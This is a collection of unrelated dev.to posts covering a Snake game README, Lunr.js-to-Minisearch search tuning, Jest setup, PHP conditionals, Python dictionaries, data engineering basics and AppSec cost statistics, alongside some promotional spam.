If you want to know the secret behind building such shapes, I have written a few articles that you can find here: https://css-articles.com
I will be writing more in the future so make sure to [subscribe to my RSS feed](https://css-articles.com/feed.xml) to not miss them.
I also shared a lot of [CSS Tips around ribbon shapes](https://css-tip.com/archive/?s=ribbon) so make sure to also subscribe [to the RSS feed of my CSS Tip website](https://css-tip.com/feed/feed.xml)
----
{% link https://dev.to/afif/i-made-100-css-loaders-for-your-next-project-4eje %}
{% link https://dev.to/afif/100-underline-overlay-animation-the-ultimate-css-collection-4p40 %}
{% link https://dev.to/afif/i-created-100-unique-css-patterns-the-best-collection-31cl %}
----
### <center>You want to support me?</center>
[](https://www.buymeacoffee.com/afif)
### <center>OR</center>
[](https://www.patreon.com/temani) | afif |
1,662,390 | A classic Snake game built using React.js, HTML Canvas, and TypeScript | Snake Game 🐍 A classic Snake game built using React.js, HTML Canvas, and... | 0 | 2023-11-10T08:58:59 | https://reactjsexample.com/a-classic-snake-game-built-using-react-js-html-canvas-and-typescript/ | games | ---
title: A classic Snake game built using React.js, HTML Canvas, and TypeScript
published: true
date: 2023-11-10 00:56:00 UTC
tags: Games
canonical_url: https://reactjsexample.com/a-classic-snake-game-built-using-react-js-html-canvas-and-typescript/
---
# Snake Game 🐍


A classic Snake game built using React.js, HTML Canvas, and TypeScript.
## Demo
You can play the game online at [Snake Game Demo](https://snakes-game-nine.vercel.app/).
## Features
- Classic Snake gameplay.
- Built with React.js and HTML canvas.
- No third-party libraries used.
- TypeScript for type safety.
- Responsive design.
- Score tracking.
- Saves HighScore
- Game over screen with the option to restart.
- Keyboard controls for navigation.
## Getting Started
To run the game locally, follow these steps:
1. Clone this repository:
2. Navigate to the project directory:
3. Install the required dependencies. Yarn is recommended:
4. Run the build script:
5. Start the game by serving the build output:
**NOTE** : The development environment causes the components to re-render, causing the game logic for the canvas to be duplicated and appear buggy. That’s why it’s recommended to build the app and run the build output to avoid the re-renders.
## Game Controls
Use the arrow keys or `W`,`A`,`S`,`D` keys on your keyboard to control the snake’s direction:
- ↑ (Up) or `W` – Move Up
- ↓ (Down) or `S` – Move Down
- ← (Left) or `A` – Move Left
- → (Right) or `D` – Move Right
Others:
- To **Pause** the game – Press `esc` or click anywhere the screen
## License
This project is licensed under the MIT License – see the [LICENSE](https://github.com/menard-codes/snakes-game/blob/main/LICENSE) file for details.
## GitHub
[View Github](https://github.com/menard-codes/snakes-game?ref=reactjsexample.com) | mohammadtaseenkhan |
1,662,730 | How to Integrate the Angular Signature Pad with a Toolbar | Learn how to integrate the Angular Signature Pad with the Toolbar component. You’ll also see how to... | 0 | 2023-11-10T10:01:54 | https://dev.to/syncfusion/how-to-integrate-the-angular-signature-pad-with-a-toolbar-4n6g | webdev, angular | Learn how to integrate the Angular Signature Pad with the Toolbar component. You’ll also see how to use many of its customization options.
The Angular Signature Pad is a graphical interface that allows users to draw smooth signatures as vector outline strokes using variable-width Bezier curve interpolation. It allows you to save signatures as images and vice versa. You can use your finger, pen, or mouse on desktop and mobile devices to draw your own signature.
The Signature Pad control supports various customization options: background color, background image, stroke color, stroke width, save with background, undo, redo, clear, read-only, and disable. In this video, each toolbar item illustrates the Signature Pad component functionalities.
Use the Undo button or Ctrl + Z key combo to revert your signature, the Redo button or Ctrl + Y key combo to remake your reverted signature, and the Save button or Ctrl + S key combo to store your signature as an image file. Use a stroke color picker and background color picker in the Signature component to apply those aspects. Users can utilize the stroke width drop-split button values to change the signature stroke width.
The variable stroke width is based on the values of the maximum stroke width, minimum stroke width, and velocity for smoother and realistic signatures. The default value of the minimum stroke width is 0.5, the maximum stroke width is 2.5 and the velocity is 0.7. Use the Clear button to clear the signature. You can also check the Disabled checkbox to disable the Signature component. You can save the signature as an image to formats like PNG, JPEG, and SVG.
**Download an example from GitHub:** https://github.com/SyncfusionExamples/how-to-integrate-the-angular-signature-pad-with-the-toolbar
**Documentation on the Syncfusion Angular Signature Pad component:**
https://ej2.syncfusion.com/angular/documentation/signature/user-interaction
{% youtube ZuSSpp1dR44 %}
| techguy |
1,662,776 | Snaptube | Snaptube YouTube downloader & MP3 converter is a simple tool to download any video from YouTube... | 0 | 2023-11-10T11:17:49 | https://dev.to/snaptubeapps/snaptube-4k7d | webdev | [Snaptube](https://snaptubeapps.net/) YouTube downloader & MP3 converter is a simple tool to download any video from
YouTube and many other similar services in an easy, fast streaming app for music and app
Download the latest version of Snaptube YouTube downloader & MP3 converter for Android. | snaptubeapps |
1,662,831 | Transitioning from Lunr.js to Minisearch.js | As I embarked on weeks five and six of my Google Summer of Code (GSoC) project, a pivotal shift took... | 26,962 | 2023-11-10T11:49:32 | https://dev.to/hetarth02/transitioning-from-lunrjs-to-minisearchjs-36aa | opensource, gsoc, julialang, devjournal | As I embarked on weeks five and six of my Google Summer of Code (GSoC) project, a pivotal shift took place in client-side searching. To optimize the initial load times, I transitioned from using Lunr.js to Minisearch.js. This change brought about a host of improvements and refinements that made a more efficient search functionality. In this blog post, I'll delve into the intricacies of this transition and explore key concepts of this transition.
## Current Implementation:
```js
lunr.tokenizer.separator = /[\s\-\.]+/
lunr.trimmer = function (token) {
return token.update(function (s) {
return s.replace(/^[^a-zA-Z0-9@!]+/, '').replace(/[^a-zA-Z0-9@!]+$/, '')
})
}
lunr.Pipeline.registerFunction(lunr.stopWordFilter, 'juliaStopWordFilter')
lunr.Pipeline.registerFunction(lunr.trimmer, 'juliaTrimmer')
var index = lunr(function () {
this.ref('location')
this.field('title', { boost: 100 })
this.field('text')
documenterSearchIndex['docs'].forEach(function (e) {
this.add(e)
}, this)
})
tokens.forEach(function (t) {
q.term(t.toString(), {
fields: ['title'],
boost: 100,
usePipeline: true,
editDistance: 0,
wildcard: lunr.Query.wildcard.NONE,
})
q.term(t.toString(), {
fields: ['title'],
boost: 10,
usePipeline: true,
editDistance: 2,
wildcard: lunr.Query.wildcard.NONE,
})
q.term(t.toString(), {
fields: ['text'],
boost: 1,
usePipeline: true,
editDistance: 0,
wildcard: lunr.Query.wildcard.NONE,
})
})
```
As you can see, we currently have many moving components in the search logic. There is a tokenizer, a trimmer function, we are boosting some fields and an `editDistance` parameter which is used during the search. We will learn what each of these is step by step.
### _Tokenization: The Foundation of Search_
```js
lunr.tokenizer.separator = /[\s\-\.]+/;
```
The process of tokenization involves breaking down the search input into individual tokens or words. This step is crucial as it lays the groundwork for the search engine to efficiently match the tokens against the indexed documents. Each token is subsequently treated as a unique identifier that allows for accurate and targeted search results. Here, we have regex which tokenizes the word using white-space or `.` because there are results such as `Documenter.Anchors.add!` which would not trigger anything if we do not tokenize it properly.
### _Trimmer Function: Polishing the Search Input_
One of the challenges you encounter is dealing with special characters and unwanted characters that might hinder the search process. To address this, a trimmer function that sanitizes the search input is used. This function identifies and removes extraneous characters, ensuring that the search query remains clean and focused. This significantly contributes to the accuracy of search results. However, there might be certain characters that are useful to us and hence we again make use of regex to not remove those characters.
```js
// custom trimmer that doesn't strip @ and !
lunr.trimmer = function (token) {
return token.update(function (s) {
return s.replace(/^[^a-zA-Z0-9@!]+/, "").replace(/[^a-zA-Z0-9@!]+$/, "");
});
};
```
### _Stopwords: Filtering out the Noise_
Stopwords are common words such as `and`, `the`, `is`, etc., that hold little semantic value and can be safely excluded from search queries. By identifying and filtering out stopwords, the search engine can allocate more attention to meaningful keywords and ultimately improve the relevance of the search results. This is particularly important when aiming for precision in search queries.
```json
// List of stop words used
[ "a","able","about","across","after","almost","also","am","among","an","and","are","as","at","be","because","been","but","by","can","cannot","could","dear","did","does","either","ever","every","from","got","had","has","have","he","her","hers","him","his","how","however","i","if","into","it","its","just","least","like","likely","may","me","might","most","must","my","neither","no","nor","not","of","off","often","on","or","other","our","own","rather","said","say","says","she","should","since","so","some","than","that","the","their","them","then","there","these","they","this","tis","to","too","twas","us","wants","was","we","were","what","when","who","whom","why","will","would","yet","you","your" ]
```
### _Field Boosting: Spotlighting Priority Fields_
In scenarios where certain fields within a document hold higher importance, field boosting comes into play. This technique assigns higher relevance scores to specific fields, effectively prioritizing them in the search results. For instance, if you're searching for products, boosting the "product name" field might yield more accurate outcomes than boosting other less relevant fields.
```js
var index = lunr(function () {
this.ref("location");
// Boost score when title matches
this.field("title", { boost: 100 });
this.field("text");
documenterSearchIndex["docs"].forEach(function (e) {
this.add(e);
}, this);
});
```
### _Fuzzy Searching: Embracing Variability_
Fuzzy searching is an indispensable feature that accounts for slight variations and typos in search queries. Edit distance, a metric used to measure the similarity between two strings, is a fundamental component of fuzzy searching. When users inadvertently mistype a word or opt for a slightly different variant, fuzzy searching leverages edit distance to identify potential matches. This ensures that users aren't penalized for minor errors such as typos or when a cat walks over their keyboard and are still presented with relevant results.

## Transitioning to MinisearchJs
Well, the above might seem daunting but minisearch is very flexible and is extremely developer friendly. Below is the minisearch implementation.
```js
let index = new minisearch({
fields: ["title", "text"], // fields to index for full-text search
storeFields: ["location", "title", "text", "category", "page"], // fields to return with search results
processTerm: (term) => {
let word = stopWords.has(term) ? null : term;
if (word) {
// custom trimmer that doesn't strip @ and !, which are used in julia macro and function names
word = word
.replace(/^[^a-zA-Z0-9@!]+/, "")
.replace(/[^a-zA-Z0-9@!]+$/, "");
}
return word ?? null;
},
// add . as a separator, because otherwise "title": "Documenter.Anchors.add!", would not find anything if searching for "add!", only for the entire qualification
tokenize: (string) => string.split(/[\s\-\.]+/),
// options which will be applied during the search
searchOptions: {
boost: { title: 100 },
fuzzy: 2,
processTerm: (term) => {
let word = stopWords.has(term) ? null : term;
if (word) {
word = word
.replace(/^[^a-zA-Z0-9@!]+/, "")
.replace(/[^a-zA-Z0-9@!]+$/, "");
}
return word ?? null;
},
tokenize: (string) => string.split(/[\s\-\.]+/),
},
});
```
### _Was the switch worth it?_
In one word, Yes! It improved cold start times by a certain magnitude but it mainly reduced the size of the index by **_16%_**.
### Implementation of Design Mockups and Static Build:
Leveraging insights from prior research on search UIs, I crafted interactive and user-friendly interfaces. These designs were aimed at enhancing the visual and functional aspects of the search modal. This involved ensuring seamless navigation, clean typography, and optimal placement of UI elements. What followed was the creation of a static build housing an impressive array of ten or more UI variations for the search modal. This diverse set of UIs allows for a comprehensive exploration of different visual and interactive possibilities.
If someone wants to test out the different options then head here, [Mock Search UIs](https://documenter-search.netlify.app/search-ui.html)

## ⚡An Unexpected Development:
With the JuliaCon 2023 coming up, my mentor asked if I could improve the current search listing with something that can be presentable enough. Well, we quickly set up a meeting to discuss how we could improve the current listing in a way that is fast enough and doesn't require much time. In the end, we decided to go with keeping the listing as it is because integrating a full-blown modal UI would require time and iterations based on feedback. Hence, we agreed to update the results using the new UI as a reference. And since I already had all the required data at my hands coming from minisearch it was just a matter of updating the DOM structure and some CSS magic🪄. I quickly put together the elements and this was the result.


## 📜Mid-Term Evals:
With the search engine changed and the mockups built, I was pretty much ready for the mid-term evaluation. This is an optional evaluation for both the mentors and contributors where each leaves feedback for the other and answers some basic questions. But, if a mentor fails you in the evals you won't be able to continue. This fact had me feeling nervous, but since I was ahead of the tasks I passed with flying colours.
## 📎Sharing My GSoC Proposal:
For those who are curious to delve deeper into the foundations of my GSoC project and explore the roadmap that led to all this, I invite you to take a look at my GSoC proposal. It outlines the initial concepts, goals, and strategies that have guided these weeks of progress. Feel free to explore the proposal here📝. Your interest in the journey is greatly appreciated, and I'm excited to share this transformative process with you.
---
If you're interested in following my progress or connecting with me, please feel free to reach out!
Github: [Hetarth02](https://github.com/Hetarth02)
LinkedIn: [Hetarth Shah](https://www.linkedin.com/in/hetarth-shah-1ab392220)
Website: [Portfolio](https://hetarth02.github.io/)
Thank you for joining me on this journey, and look forward to more updates as I continue to contribute to the Julia community during GSoC.
Credits:
Cover Image from [Minisearch Repo](https://github.com/lucaong/minisearch).
| hetarth02 |
1,662,983 | Unit Test | Jest I used Jest to add unit tests in my typescript project, which is straight-forward and... | 0 | 2023-11-10T14:57:17 | https://dev.to/seogjun/unit-test-4jmp | ### Jest
I used `Jest` to add unit tests in my typescript project, which is straight-forward and I used to work with `Jest` before, I felt it was handy.
### What is Jest?
Jest is a JavaScript testing framework designed to ensure correctness of any JavaScript codebase.
### Jest with Typescript
#### Prerequisite
```bash
npm i -D jest typescript
```
#### Step1
```bash
npm i -D ts-jest @types/jest
```
#### Step2
```bash
npx ts-jest config:init
```
#### Step3
Create `{file_name}.test.ts` for unit testing and run the following command.
```
"test": "jest -c jest.config.ts --runInBand --",
"test:watch": "jest -c jest.config.ts --runInBand --watch --",
```
`npm run test` command is to run all unit test files such as `{file_name}.test.ts` and `npm run test:watch` is to keep watching your test results when you fix your code.
Also, you can check the coverage based on your unit testing and it shows how many unit test covers your code, this is the script for checking coverage:
```
"coverage": "jest -c jest.config.ts --runInBand --coverage"
```
### Learning Opportunity
When I started with my project, my priority was to implement functionalities and run the project properly, so I really didn't think about edge cases and fail cases. Always assume that my app is working properly. However, this time I found out I missed lots of error handling function by using `try` and `catch`, so I refactored my codes and improved the quality of my project. Also, I realized unit testing is much harder and more important than implementing the features. It requires more energy and effort to verify my project works properly. I'll be getting used to unit testing and next time I'll implement an integration test with Github actions | seogjun | |
1,663,029 | Digital Empire: Mobile App Development in New York | Energize your business with cutting-edge app development services in New York's vibrant and dynamic... | 0 | 2023-11-10T15:56:59 | https://dev.to/martindye/digital-empire-mobile-app-development-in-new-york-7ed | Energize your business with cutting-edge [app development services in New York](https://www.technbrains.com/locations/mobile-app-development-new-york/)'s vibrant and dynamic landscape, tailored to redefine your digital presence.
**Reach Out To Us**
Email: contact@technbrains.com
Call: 833-888-8370
**Social Links**
Facebook
https://www.facebook.com/pages/category/Software-Company/Technbrains-100478948441594/
Twitter
https://twitter.com/technbrains
Instagram
https://www.instagram.com/technbrains/
LinkedIn
https://www.linkedin.com/company/technbrains
| martindye | |
1,663,404 | Unit Testing | This week, my focus in the development of Learn2Blog centred on implementing unit testing, a crucial... | 0 | 2023-11-11T01:21:11 | https://dev.to/yousefmajidi/unit-testing-1l1o | opensource, beginners, testing, dotnet | This week, my focus in the development of [Learn2Blog](https://github.com/Yousef-Majidi/Learn2Blog) centred on implementing unit testing, a crucial aspect of ensuring the reliability and stability of the project. In this blog post, I'll delve into the significance of unit testing and touch upon the broader concept of end-to-end testing.
### The Importance of Testing
Unit testing and end-to-end testing are essential practices in software development, contributing to the overall quality and robustness of a project. Unit testing involves testing individual components or functions in isolation, ensuring they produce the expected output. On the other hand, end-to-end testing validates the entire system's functionality, simulating real-world scenarios.
## xUnit.net
I opted to use xUnit.net, a testing framework recommended by [Microsoft's dotnet documentation](https://learn.microsoft.com/en-us/dotnet/core/testing/#testing-tools). xUnit.net is known for its simplicity and efficiency in writing and executing tests.
To integrate xUnit.net into your project, execute the following command:
```bash
dotnet add package xunit
```
For creating a testing project and class in Visual Studio (Code), consider adding the `xunit.runner.visualstudio` package, ensuring it's applied to the testing project, not the main one.
### Creating a Testing Project
A testing project is crucial for maintaining a clean separation between the main project and its tests. In xUnit.net, each class and its methods in the testing project correspond to the classes and functionalities being tested.
#### Importing Main Project
To import the main project into the testing project, modify the `TestingProject.csproj` file:
```xml
<ItemGroup>
<ProjectReference Include="Relative path to MainProject.csproj" />
</ItemGroup>
```
> Ensure the path is correctly specified.
#### Writing Tests
I organized my tests by creating separate test classes corresponding to classes in the main project. For instance, the main project class `CommandLineParser` has a corresponding test class named `CommandLineParserTests`.
Utilizing `ITestOutputHelper` allows printing messages for each test and we can use it in our test class like so:
```c#
public class CommandLineParserTests
{
private readonly ITestOutputHelper output;
public CommandLineParserTests(ITestOutputHelper output)
{
this.output = output;
}
// rest of the code...
}
```
Here is an example of one of the tests the return outcome of running the app without any arguments:
```c#
[Fact]
public void TestNoArgumentReturnsNull()
{
this.output.WriteLine("Should return null when user passes no arguments");
var args = Array.Empty<string>();
CommandLineOptions? options = CommandLineParser.ParseCommandLineArgs(args);
Assert.Null(options);
}
```
In this code, the `[Fact]` attribute indicates it as a test method. It then creates an empty array to pass as args to simulate passing no arguments through the CLI and then asserts that `options` is returned as `null`.
### Using `[Theory]` in xUnit
xUnit.net's `[Theory]` attribute simplifies testing scenarios with different sets of input data.
```c#
[Theory]
[InlineData("-o")]
[InlineData("--output")]
public void TestOutputArgument(string arg)
{
this.output.WriteLine("Should return option with OutputPath == 'testOutput'");
string outputPath = "testOutput";
var args = new string[] { arg, outputPath, "input" };
CommandLineOptions? options = CommandLineParser.ParseCommandLineArgs(args);
Assert.Equal(outputPath, options?.OutputPath);
}
```
The `[Theory]` attribute allows running the same test with different input values. In this example, the test checks if the `CommandLineParser` correctly handles different forms of the output argument.
## Incomplete Tests
While I successfully implemented several tests, some scenarios proved challenging. For example, testing the `-c / --config` argument requires mocking the config file, a task I documented in [issue #18](https://github.com/Yousef-Majidi/Learn2Blog/issues/18). Moq, a common tool for this in C# projects, was attempted but not fully successful.
### Code Coverage
Code coverage is an essential metric indicating the percentage of code exercised by tests. Although I haven't yet implemented it in Learn2Blog, Microsoft guides generating code coverage reports for .NET projects [here](https://learn.microsoft.com/en-us/dotnet/core/testing/unit-testing-code-coverage?tabs=windows). The pursuit of 100% code coverage ensures a more comprehensive validation of code integrity.
## End-to-End Testing
As of now, Learn2Blog lacks a dedicated end-to-end test. While core features have been extensively tested in unit tests, [issue #20](https://github.com/Yousef-Majidi/Learn2Blog/issues/20) has been created to address this gap.
End-to-end testing involves validating the entire application's workflow, ensuring all components work harmoniously. It complements unit testing by verifying the integration of various modules.
## Lessons Learned
Reflecting on the testing process, it became evident that certain design flaws and bugs surfaced during testing. This emphasizes the importance of early test development, enabling the identification and rectification of issues before they escalate.
Automated tests, both unit and end-to-end, play a pivotal role in uncovering hidden bugs. The experience also highlighted the need for modular code, making it easier to test and maintain.
The bug with the `StringWriter` instance revealed during testing underscores the value of running multiple tests consecutively, mimicking real-world usage scenarios.
After squashing all of the different commits into a single one, it was merged into the `main` branch. You can review all the changes in [8e8edac](https://github.com/Yousef-Majidi/Learn2Blog/commit/8e8edac789ab6b1ade79e217b1537f9e1b16d879).
## Conclusion
In conclusion, the journey of implementing unit testing in Learn2Blog has been enlightening, exposing both strengths and areas for improvement. Embracing automated testing from the early stages is key to building a resilient and reliable software application. As development progresses, addressing the identified issues and continually expanding test coverage will be a priority for ensuring the long-term integrity of the project. | yousefmajidi |
1,663,482 | Implementing a Testing Framework | This week I managed to add a testing framework to my open source project, TILerator. Since it's a... | 0 | 2023-11-11T03:04:38 | https://dev.to/mismathh/implementing-a-testing-framework-2m0p | beginners, opensource, javascript, testing | This week I managed to add a testing framework to my open source project, [TILerator](https://github.com/mismathh/TILerator). Since it's a JavaScript project, I decided to use [Jest](https://jestjs.io/) as my testing framework.
<h2>What is Jest?</h2>
Jest is a JavaScript testing framework developed by Facebook, and is widely used for testing JavaScript and React applications. I have been exposed to Jest in other projects and along with having a detailed [documentation](https://jestjs.io/docs/getting-started), it is quite easy to install.
<h3>Setting up Jest</h3>
Jest is needed only for testing purposes so install it as a dev dependency.
```JavaScript
npm install --save-dev jest
```
Next, add a test script to your `package.json` file to be able to run tests using Jest.
```Json
"scripts": {
"test": "jest --",
"test:watch": "jest --watch --"
}
```
Finally, create a testing directory to hold all of you tests.
<h2>Writing Tests</h2>
For my first test, I decided to test out a function that receives a string and checks if a certain `regex` pattern can be matched, and if it can, it adds an HTML `<b></b>` tags to the string. I wrote 5 tests to check on the function's behaviour with certain inputs.
```JavaScript
describe('markdownToHTML tests', () => {
test('should return a string with <b> tags if part of string is encompassed between **', () => {
expect(markdownToHTML('**sentence 1** sentence 2 **sentence 3**')).toBe('<b>sentence 1</b> sentence 2 <b>sentence 3</b>');
});
```
In order to test out the core functionality of the program, I also wrote 3 tests to confirm if the correct output would be returned. There was one hiccup when writing these tests, as within the core functions, I used `process.exit()` to exit the program on certain conditions, and if it is called within a Jest test, it will immediately stop the test runner which could lead to incomplete test results.
After reading the documentation to combat this, I found out about `mock functions` and `spyOn()`. Using mock functions and `mockImplmentation()`, we can define the default implementation of a mock function, and the spyOn() function can be used to monitor the behaviour of the function. Combining these functions resulted in being able to monitor `process.exit()` to check the exit code that was outputted while not actually exiting the process.
```JavaScript
test("should exit with exit code -1 and error message if invalid file path is given", async () => {
const mockStdErr = jest.spyOn(console, "error").mockImplementation();
const mockExit = jest.spyOn(process, "exit").mockImplementation();
```
The testing commit can be found here: [fc128e0](https://github.com/mismathh/TILerator/commit/fc128e073795b80cf1ce7474c14c60aaedb530f2)
<h2>Learning Outcomes</h2>
Despite working with Jest before in other JavaScript projects, there was still a lot that I learned on the capabilities of Jest. Additionally, from writing all those tests, I improved my understanding of TILerator. Testing should be a fundamental process that is used within your project to not only identify bugs, but to also create reliable software. If you have a JavaScript project that needs a testing framework, try out Jest! | mismathh |
1,663,563 | Python - Use Hash Tables (Dictionaries) for Fast Data Retrieval | Hash tables, often implemented as dictionaries in Python, are a fundamental data structure for... | 0 | 2023-11-24T15:30:00 | https://dev.to/theramoliya/python-use-hash-tables-dictionaries-for-fast-data-retrieval-1oom | python, programming, beginners, tutorial | Hash tables, often implemented as dictionaries in Python, are a fundamental data structure for efficiently storing and retrieving data. They provide constant-time average-case lookup, insertion, and deletion operations, making them valuable for various applications. Here's an example:
```python
def count_elements(arr):
element_count = {} # Create an empty dictionary to store counts
for element in arr:
if element in element_count:
element_count[element] += 1 # Increment count if element exists
else:
element_count[element] = 1 # Initialize count if element is new
return element_count
# Example usage:
my_list = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4]
result = count_elements(my_list)
print(result) # Output: {1: 1, 2: 2, 3: 3, 4: 4}
```
In this example, we use a dictionary (`element_count`) to efficiently count the occurrences of elements in a list. We iterate through the list, checking whether each element exists in the dictionary. If it does, we increment its count; otherwise, we initialize it with a count of 1. This approach provides a straightforward and efficient way to compute element frequencies.
Hash tables are versatile and can be applied to various problems, such as caching, frequency counting, memoization, and more. Leveraging Python dictionaries effectively can lead to clean and performant solutions in many scenarios. | theramoliya |
1,663,802 | Data Engineering for Beginners: A Step-by-Step Guide | Introduction The data age has come with challenges that require innovations and the... | 0 | 2023-11-11T12:39:25 | https://dev.to/allan_ouko/data-engineering-for-beginners-a-step-by-step-guide-1o9p | ## Introduction
The data age has come with challenges that require innovations and the development of existing technological services to handle huge amounts of data. Data from various sources also require faster processing to make it available for different use cases. Therefore, data engineering has become part of the ecosystem in different organizations, especially those handling huge streaming data. It is now common to find organizations setting up a team of data engineers to ensure they properly capture the data as it streams in for the different cases.
## What is Data Engineering?
Data engineering refers to designing, building, and maintaining the data infrastructure required to collect, store, process, and analyze large data. This data may usually come from various sources, and then it gets to a centralized warehouse for processing and storage for other uses by the different data engineering teams. Hence, a data engineer is a professional tasked with conducting the data engineering process to ensure quality and availability.
## Roles and Responsibilities of Data Engineers
Below are some of the core responsibilities handled by data engineers;
1. Designing and deploying data pipelines to extract, transform, and load (ETL) data from various sources.
2. Managing data warehouses to store huge volumes of data and scale the data warehouses and data lakes to perform optimally.
3. Database design and data modeling handle different data types ingested in the data warehouse.
4. Collaboration with analytics team members, such as data scientists, to ensure efficient data collection, proper data quality checks, and data analytics.
5. Monitoring and maintaining the built data pipelines to ensure accuracy and consistency in data processing and ingestion.
## Skills for Data Engineer
Aspiring data engineers need the following skills to become proficient in the process.
**1. Programming languages (Python and SQL):** Python is necessary for writing code to automate workflows. SQL is also important for querying data from databases.
**2. Databases:** Database knowledge is important for understanding the different types, such as structured and NoSQL databases. A data engineer should know when to implement the use of each type with the necessary tools.
**3. Data warehousing:** Data warehousing is necessary to build databases for handling large data. This knowledge should also include learning Amazon Redshift and Google BigQuery to handle large warehouse data.
**4. ETL processes:** Learning the extract, load, and transform process helps determine how to fetch data from the different sources and prepare for different use cases.
**5. Big data frameworks:** A data engineer should also learn to manage big data using frameworks such as Apache Spark and Apache Hadoop.
**6. Data pipeline orchestration:** Data pipeline orchestration is necessary with tools such as Apache Airflow to manage the workflow. This process ensures data will move through different stages smoothly to the required database.
**7. Data modeling and design:** A data engineer should learn data modeling and design to know how the different data relate to each other and where and how to store the information.
**8. Streaming data:** Data engineers also need tools like Apache Kafka for real-time data streaming.
**9. Infrastructure and cloud services:** Know about platforms like AWS, Microsoft Azure, and GCP, where you can use computers in the cloud to help manage and store your data without needing your servers.
**10. Data quality and governance:** It is also important for data engineers to ensure data is accurate and reliable by implementing the best data quality practices. Besides, implementing data security ensures data is protected from security breaches.
## Summary
Data engineering is vital for most organizations that deal with big data and require automation and consistency in data collection, preparation, and analysis. There is also an increasing demand for data engineers, and data availability pushes most of these organizations to set up the infrastructure to handle the information. Thus, aspiring data engineers need to understand the basics of data engineering to build reliable data pipelines.
| allan_ouko | |
1,663,813 | EP 5 - Conditionals and Booleans | So interesting lesson where we touch again on string interpolation and introduce booleans and... | 0 | 2023-11-11T13:18:28 | https://dev.to/kostanovak/ep-5-conditionals-and-booleans-488 | interpolation, conditionals, php | So interesting lesson where we touch again on string interpolation and introduce booleans and conditionals.
I solved task myself first by including conditional logic inside h1 like this:
```PHP
<body>
<?php
$name = "Dark Matter";
$read = true;
?>
<h1>
<?php
if ($read){
echo "You have read $name";
}else {
echo "You have NOT read $name";
}
?>
</h1>
</body>
```
Jeffrey did it afterwards in more effective way I think with separating conditional logic and putting it inside first php tag before h1 and also by introducing $message variable like this :
```PHP
<body>
<?php
$name = "Dark Matter";
$read = false;
if ($read){
$message = "You have read $name";
}else {
$message = "You have NOT read $name";
}
?>
<h1>
<?php
echo $message;
?>
</h1>
</body>
```
So basically we are only echoing out our variable inside h1 tag and keeping conditional logic in separate php tag. More elegant solution I guess.
| kostanovak |
1,663,852 | Making Utility App Development a Breeze with Tech Experts | In today's digital world, finding a friend who can simplify Utility App Development is like striking... | 0 | 2023-11-11T14:33:50 | https://dev.to/asadbashir/making-utility-app-development-a-breeze-with-tech-experts-53n | In today's digital world, finding a friend who can simplify Utility App Development is like striking gold. Lucky for you, we have the wizards of simplicity, your go-to Tech Experts. Let's take a walk through their easy solutions, making Utility App Development a walk in the park.
## Tech Experts Unveiled: Simplifying Utility App Development
Tech Experts, your friendly wizards in the tech realm, are here to simplify the sometimes tricky world of Utility App Development. Step into the realm where [Tech Experts](https://techxpert.io/) work their magic, creating solutions that are not just powerful but also incredibly easy to use.
## Your Utility Ally: How Tech Experts Master Utility App Development
Right here in your digital neighborhood, Tech Experts emerge as your trusted Utility App Development buddies. They don't just create apps; they build companions that understand your utility needs. Tech Experts become your ally, ensuring every app they craft is effortlessly useful for you.
### Unleashing Tech Wonders: Tech Experts as Your Local Utility Gurus
Tech Experts, your local tech gurus, are on a mission to unleash the wonders of technology for you. Explore the simplicity of Utility App Development and let Tech Experts guide you through the world of effortless utility solutions.
### Making Tech Easy: Tech Experts' Approach to Utility App Development
In the heart of your digital hub, Tech Experts are changing the game by making technology easy. Utility App Development becomes straightforward and accessible under their expert care. Tech Experts' approach is not just about apps; it's about simplifying your utility experience.
### Your Utility App Partner: Tech Experts' Easy Solutions
When it comes to Utility App Development, Tech Experts aren't just developers; they are your partners. Every app they create is designed to be easy, ensuring that you don't need a tech manual to navigate through the utility landscape.
### The Tech Experts Difference: Utility Apps, Made Easy for You
What sets Tech Experts apart is their commitment to making Utility App Development easy for everyone. In your digital hub, they are not just developers; they are your guides in the world of hassle-free utility technology.
Now, let's explore why having a Utility App Development partner like Tech Experts is a game-changer for you.
Living in a world where things move fast, having a local Utility App Development partner simplifies your utility needs. Tech Experts understand the pulse of the community and tailor their solutions to meet your specific utility requirements.
Whether you're a business owner or an individual seeking an easy-to-use Utility App, Tech Experts have got you covered. They prioritize simplicity without sacrificing functionality, ensuring that your utility experience is smooth and enjoyable.
Tech Experts' approach goes beyond just being a Utility App Development provider; they aim to be your utility ally. In your digital neighborhood, having a partner who speaks your language and makes utility tech easy is invaluable. Tech Experts bridge the gap between complex utility technology and everyday users, offering a refreshing take on Utility App Development. | asadbashir | |
1,663,858 | AppSec and DevSecOps: part 1 - metrics, statistics, challenges, state of the industry | Intro We can hear quite often that cybersecurity in a companies with low maturity is... | 0 | 2023-11-11T15:59:59 | https://dev.to/d3one/appsec-and-devsecops-part-1-metrics-statistics-challenges-state-of-the-industry-3fg3 | security | # **Intro**
We can hear quite often that cybersecurity in a companies with low maturity is expensive and it make a questions about what benefits it brings to the business. Why does a development need AppSec\DevSecOps specialists? Why is the cost of fixing a code defect at the design level cheaper than at the development stage, and even more so at the release and production stage. So, and how Shift Left can help save a company money in the long term.
In the material below, we will consider the relevance of the issue, evaluate the effectiveness of AppSec\DevSecOps in investing in the final high-quality product, analyze some metrics, look at the criteria for assessing the effectiveness of AppSec\DevSecOps processes and, finally draw a conclusion - who needs AppSec\DevSecOps and when.

# [General statistics]
**Let's take a look at some stats:**
- Recent studies show 210% new vulnerabilities per year in the National Vulnerability Database (NVD)
- 92% of developers feel pressure to release code to market faster
- Top 50 US university coding programs currently don't require their students to take secure coding courses
Let's consider that almost [95% of data breaches](https://www.verizon.com/business/resources/reports/dbir/) last year were on web apps, and 56% of the biggest incidents in the last 5 years tie back to web app security issues. It often takes more than eight months to find a web app exploit, which means that your business and your customers can be exposed to attackers for an extended period of time.
**Attacks on web apps have cost over $7.6 billion, representing 42% of all financial losses from attacks.**
## What are the difficulties?
**Cost to Remediate Vulnerabilities**
It often takes up to 7 hours for a vulnerability to be detected, prioritized, and remediated – making your application a sitting duck. When your team does learn of a vulnerability, you need to act quickly to remediate the problem.
Studies show that the average time to detect, prioritize, and remediate one vulnerability is 7 hours.
**Let's look at the calculations:**
- A team is faced with **5,000 vulnerabilities**
- They fix at least 30% of the vulnerabilities = **1,500 vulnerabilities to fix**
- 1,500 vulnerabilities @ 7 hours each = **10,500 hours of developer work**
- 10,500 hours of developer work @ $72/ hour\* = **$757,215**
**The total average cost to remediate vulnerabilities is $757,215 annually.**
